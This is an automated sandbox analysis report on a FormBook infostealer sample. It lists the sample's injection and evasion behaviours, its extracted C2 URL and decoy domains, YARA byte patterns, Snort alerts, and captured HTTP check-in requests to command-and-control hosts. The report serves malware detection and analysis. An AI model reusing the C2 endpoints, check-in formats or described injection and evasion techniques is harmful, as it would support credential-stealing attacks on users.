Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
inlaww321345.exe

Overview

General Information

Sample Name:inlaww321345.exe
Analysis ID:626561
MD5:43e64e0ab6ca479c2af3afed56216a91
SHA1:983a822ffde2b558dfe2a8ac1dcc4d42df0f1d94
SHA256:cbdf1e33bc694b1ca634a4b042bd010050c9baf99078c91adf961ef92cebd305
Tags:exeformbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • inlaww321345.exe (PID: 6464 cmdline: "C:\Users\user\Desktop\inlaww321345.exe" MD5: 43E64E0AB6CA479C2AF3AFED56216A91)
    • idczzzzbpy.exe (PID: 6492 cmdline: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk MD5: 0A3F789C1F124B76E2EDC74EBEACF70A)
      • idczzzzbpy.exe (PID: 6516 cmdline: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk MD5: 0A3F789C1F124B76E2EDC74EBEACF70A)
        • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • chkdsk.exe (PID: 6248 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
            • cmd.exe (PID: 6368 cmdline: /c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 1804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.boxberry-my.com/sn31/"], "decoy": ["matsuomatsuo.com", "104wn.com", "bolacorner.com", "dawonderer.com", "yourpamlano.xyz", "mtzmx.icu", "lepakzaparket.com", "barmagli.com", "danta.ltd", "marumaru240.com", "people-centeredhr.com", "test-brew-inc.com", "clairvoyantbusinesscoach.com", "aforeignexchangeblog.com", "erentekbilisim.com", "gangqinqu123.net", "defiguaranteebonds.com", "thegioigaubong97.site", "vaoiwin.info", "vcwholeness.com", "03c3twpfee5estjovfu2655.com", "mutantapeyachtclubtoken.store", "pixelkev.xyz", "corporacioncymaz.com", "iampro-found.com", "azureconsults.com", "bam-bong.com", "advanceresubeopene.biz", "tzjisheng.com", "krdz28.online", "ycw2009.com", "minioe.com", "dronelink.xyz", "autu.cfd", "sdwmkj.com", "uixray.xyz", "informacion-numero-24-h.site", "123dianyingyuan.com", "tj-assets.com", "usaservicedogregistratuon.com", "metagwnics.com", "pepeksquad2.host", "kc7.club", "yundtremark.com", "finance-employers.com", "euroglobalnews.info", "estudioenzetti.com", "rodosmail.xyz", "bm65.xyz", "bchmtn.net", "server4uuss.net", "maisonretraiteprivee.com", "atelierelzaaidar.com", "thegurlyboutique.com", "primobellaquartz.com", "jetskirentaldublin.com", "akmeetech.com", "withoutyoutube.com", "blackcreekwatershed.com", "89qp52.com", "e3488.com", "vote4menk.com", "tyma.club", "theceditpalooza.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.idczzzzbpy.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.idczzzzbpy.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.idczzzzbpy.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        1.2.idczzzzbpy.exe.700000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.idczzzzbpy.exe.700000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.3188.114.96.1049808802031449 05/14/22-13:08:49.696707
          SID:2031449
          Source Port:49808
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3188.114.96.1049808802031453 05/14/22-13:08:49.696707
          SID:2031453
          Source Port:49808
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3188.114.96.1049808802031412 05/14/22-13:08:49.696707
          SID:2031412
          Source Port:49808
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.boxberry-my.com/sn31/"], "decoy": ["matsuomatsuo.com", "104wn.com", "bolacorner.com", "dawonderer.com", "yourpamlano.xyz", "mtzmx.icu", "lepakzaparket.com", "barmagli.com", "danta.ltd", "marumaru240.com", "people-centeredhr.com", "test-brew-inc.com", "clairvoyantbusinesscoach.com", "aforeignexchangeblog.com", "erentekbilisim.com", "gangqinqu123.net", "defiguaranteebonds.com", "thegioigaubong97.site", "vaoiwin.info", "vcwholeness.com", "03c3twpfee5estjovfu2655.com", "mutantapeyachtclubtoken.store", "pixelkev.xyz", "corporacioncymaz.com", "iampro-found.com", "azureconsults.com", "bam-bong.com", "advanceresubeopene.biz", "tzjisheng.com", "krdz28.online", "ycw2009.com", "minioe.com", "dronelink.xyz", "autu.cfd", "sdwmkj.com", "uixray.xyz", "informacion-numero-24-h.site", "123dianyingyuan.com", "tj-assets.com", "usaservicedogregistratuon.com", "metagwnics.com", "pepeksquad2.host", "kc7.club", "yundtremark.com", "finance-employers.com", "euroglobalnews.info", "estudioenzetti.com", "rodosmail.xyz", "bm65.xyz", "bchmtn.net", "server4uuss.net", "maisonretraiteprivee.com", "atelierelzaaidar.com", "thegurlyboutique.com", "primobellaquartz.com", "jetskirentaldublin.com", "akmeetech.com", "withoutyoutube.com", "blackcreekwatershed.com", "89qp52.com", "e3488.com", "vote4menk.com", "tyma.club", "theceditpalooza.com"]}
          Multi AV Scanner detection for submitted file
          Source: inlaww321345.exeVirustotal: Detection: 53%Perma Link
          Source: inlaww321345.exeReversingLabs: Detection: 56%
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.boxberry-my.com/sn31/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeReversingLabs: Detection: 46%
          Machine Learning detection for sample
          Source: inlaww321345.exeJoe Sandbox ML: detected
          Source: 2.0.idczzzzbpy.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.idczzzzbpy.exe.700000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.idczzzzbpy.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.idczzzzbpy.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.idczzzzbpy.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: inlaww321345.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: inlaww321345.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\nwmcc\xasivn\insq\a82874181cac4c8c8d839f9e6026f5f4\nkrdof\moxadzwk\Release\moxadzwk.pdb source: inlaww321345.exe, 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp, idczzzzbpy.exe, 00000001.00000000.239867122.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000002.00000000.244915451.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, chkdsk.exe, 00000010.00000002.507707421.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.509886446.00000000058BF000.00000004.10000000.00040000.00000000.sdmp, nsuD94B.tmp.0.dr, idczzzzbpy.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: idczzzzbpy.exe, 00000001.00000003.245625219.000000001A210000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000001.00000003.242881004.000000001A080000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: idczzzzbpy.exe, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D7A
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,0_2_004069A4
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 4x nop then pop ebx2_2_00407B1D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 4x nop then pop edi2_2_00417DA4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop ebx16_2_00977B1D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi16_2_00987DA4

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.10 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.85.152.171 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.informacion-numero-24-h.site
          Source: C:\Windows\explorer.exeDomain query: www.tzjisheng.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49808 -> 188.114.96.10:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49808 -> 188.114.96.10:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49808 -> 188.114.96.10:80
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.rodosmail.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.boxberry-my.com/sn31/
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS HTTP/1.1Host: www.informacion-numero-24-h.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0 HTTP/1.1Host: www.tzjisheng.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 188.114.96.10 188.114.96.10
          Source: Joe Sandbox ViewIP Address: 188.114.96.10 188.114.96.10
          Source: inlaww321345.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: unknownDNS traffic detected: queries for: www.informacion-numero-24-h.site
          Source: global trafficHTTP traffic detected: GET /sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS HTTP/1.1Host: www.informacion-numero-24-h.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0 HTTP/1.1Host: www.tzjisheng.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040580F

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
